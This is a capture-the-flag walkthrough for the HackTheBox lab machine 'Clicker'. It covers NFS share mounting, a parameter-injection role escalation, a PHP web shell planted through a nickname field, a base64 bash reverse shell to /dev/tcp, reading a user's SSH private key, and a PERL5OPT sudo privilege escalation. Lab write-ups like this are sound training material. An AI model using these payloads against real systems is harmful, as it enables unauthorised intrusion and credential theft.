Clicker — HackTheBox Machine Simple Writeup by Karthikeyan Nagaraj | 2024

Enumeration and AnalysisInitial Foothold
1. Port — 2049
2. Port — 80
3. User.txt
4. Alternate Option to get into the MachinePrivilege EscalationSimple Video Poc ( For section 2.4 )

Note: I’m unable to do an elaborated writeup for now, hope will post soon.

Start the VPN and Perform a basic Nmap scan:
nmap -sC -sV 10.10.11.232

2. Open 10.10.11.232 in a Browser, it will show the hostname after the redirection.

3. Now, Add the hostname to /etc/hosts file using the following command to access the clicker.htb —
echo “10.10.11.232 clicker.htb” | sudo tee -a /etc/hosts

4. Then, perform a Directory Enumeration using the following command dirsearch -u clicker.htb -e*
(or)
gobuster dir -u http://clicker.htb/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

5. Similarly, perform a DNS Enumeration using the following command — gobuster dns -d clicker.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 20

1. Port — 2049

Let’s look at port 2049 which is used by the Network File System (NFS) for remote filesystem access. It's a client/server system that lets users access files across a network and treat them as if they were in a local file directory.To explore the available network shares on the Clicker machine, execute the following commandshowmount -e clicker.htb and explore potential entry points for investigation.Then use the below commands to mount the shares
sudo mkdir /mnt/nfs
sudo mount clicker.htb:/ /mnt/nfs -o nolock
cd /mnt/nfs/mnt/backups
cp clicker.htb_backup.zip LOCATION_TO_UNZIPAfter Unzipping the File, we can see the website code which will be useful for inspecting the website.

2. Port — 80

On Enumerating the webpage with a comparison to the files that we got from the victim machine, we get to know that there is a flaw in the web application that lets us execute Arbitrary Commands.To do that, create an Account and log in to that.Click play, turn on the intercept, and proxy On.Click save, capture the request, modify the parameters below, and send the request:
/save_game.php?clicks=1&level=1&role%0a=AdminThe Above request will make us Admin. Log out and log in again and you’ll see an Administrator Panel.Click play and capture the request of the /save_game.phpNow add the parameter at the end of the request
&nickname=<%3fphp+system($_GET[‘cmd’])+%3f>Go to home, Click on Administration click Export, and capture the request.Change the extension to PHP and send the request.Open a Terminal and type nc -lvnp 4444 to start a listener.Open another Terminal and enter the following command by replacing your IP
echo “sh -i >& /dev/tcp/<your ip>/4444 0>&1” | base64Now go to the link, add your rev shell code that you got above and the filename that you exported.
https://clicker.htb/exports/FILENAME.PHP?echo “<encoded base64 rev shell code>” | base64 -d | bashIf you did everything right then you’ll get a reverse shell on the listener, or else you can use the 4-section Alternate option to get into the machine.

3. User.txt

On Inspecting every directory, we got something interesting in /opt/manage/ the directory.Which is an executable script used to read, modify, and update SQL statements, etc..We can use that to read the private SSH key of the user.Type the below commands to do that:
cd /opt/manage/
./execute_query 5 ../.ssh/id_rsaThen it will display the SSH key of the user, copy that, and paste that into a file in your machine without any extension. Use
nano KEY_FILENAMEIn your machine, type the following command — Make sure that the key is in the current directory:
chmod 600 KEY_FILENAME
ssh jack@clicker.htb -i KEY_FILENAMENow you can get the user.txt

4. Alternate Option to get into the Machine:

I’m providing this section only for those who are making mistakes in getting into the machine. I hope you will use this section temporarily. Make sure to fix any mistakes that you have made in getting the reverse shell.So to get into the machine, you can use the SSH private key of the user jack which you can get here

3. After you downloaded the file, follow the steps in section 3 to get the user.txt

Let’s start with sudo -l . The sudo -l command is used to list the allowed (or prohibited) commands for the invoking user on the current host. This command provides information about the user's sudo privileges, specifically showing which commands they are allowed to execute with elevated privileges.Which reveals a script /opt/monitor.shOn Inspecting the file we get to know that the file is associated with the vulnerability called perl startup privilege escalationType the below commands to get root:
sudo PERL5OPT=-d PERL5DB=’exec “chmod u+s /bin/bash”’ /opt/monitor.sh
bash -p